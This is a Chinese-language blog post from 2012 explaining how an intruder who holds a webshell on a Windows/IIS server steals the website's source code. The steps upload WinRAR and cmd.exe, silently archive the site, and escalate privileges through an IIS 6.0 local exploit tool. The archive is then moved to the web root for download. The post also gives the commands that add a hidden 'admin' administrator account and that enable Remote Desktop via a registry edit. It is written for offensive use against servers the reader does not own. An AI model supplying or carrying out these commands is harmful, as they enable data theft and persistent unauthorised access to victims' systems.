webshell下打包网站的方法

作者:admin发表时间:2012-4-18 评论:0 点击 4,360+

有时候拿下webshell后如果感觉网站还可以怎么打包源码呢,大多数webshell都有FSO打包,但是有时文件大了打不了包,那我们就可以试试windows下面的解压缩工具WinRAR来打包,WinRAR支持命令行操作。

如果服务器没有安装winRAR,那我们自己上传一个上去,上传到有可写权限的目录。

clip_image002

首先要看看wscript.shell √ 命令行执行组件要支持才能执行cmd命令。

如果服务器没有cmd文件,那么自己上传一个,如果服务器没有执行命令的权限。那么需要借用提权工具,和cmd一样上传到可写目录。

先随便执行一条命令试试看我的cmd上传到C:\RECYCLER\cmd.exe目录里

clip_image004

如果有权限可以直接执行

   1: C:\ProgramFiles\WinRAR\WinRAR.exe a -ibck C:\RECYCLER\index2012zz.zip C:\xxx_sit2012\index2012zz

命令

其中C:\ProgramFiles\WinRAR\WinRAR.exe 为winRAR上传的绝对路径, a 为压缩 –ibck 为静默压缩,桌面不会有提示的,C:\RECYCLER\index2012zz.zip为压缩后文件的绝对路径,C:\xxx_sit2012\index2012zz为需要压缩的文件的绝对路径。

这里权限不够我们需要借助IIS6.0本地溢出漏洞来执行命令,那命令如下,其中i为工具上传路径

   1: C:\RECYCLER\i.exe "C:\Program Files\WinRAR\WinRAR.exe a -ibck C:\RECYCLER\index2012zz.zip C:\xxx_sit2012\index2012zz"

clip_image006

命令执行完成,我们来到C:\RECYCLER\目录看看,成功压缩。

clip_image008

然后转移到网站根目录下载

clip_image010

可以下载了

clip_image012

几百M慢慢下吧 哈哈~

就这么简单,提取也是一个道理自不过命令不一样

如果需要提取执行以下命令创建账户

   1: C:\RECYCLER\i.exe "net user admin admin /add"
   2: C:\RECYCLER\i.exe "net localgroup administrators admin /add"

看看开3389了没,如果开了查看是否修改过端口。如果没开那就执行如下命令开3389

   1: C:\RECYCLER\i.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f"

注意上面所有命令之间是一个空格。

好了就到这点,服务器是内外我就不提权了,哈哈~~

顶一下 2 踩一下 0

你可能对以下内容感兴趣!

  1. 谈一谈让wordpress更安全
  2. 湖南首例电信黑客案主犯获刑11年
  3. 网路攻击

发表评论

*

w_0002.gif w_0009.gif w_0007.gif w_0011.gif w_0005.gif w_0008.gif w_0010.gif w_0003.gif w_0012.gif w_0001.gif w_0006.gif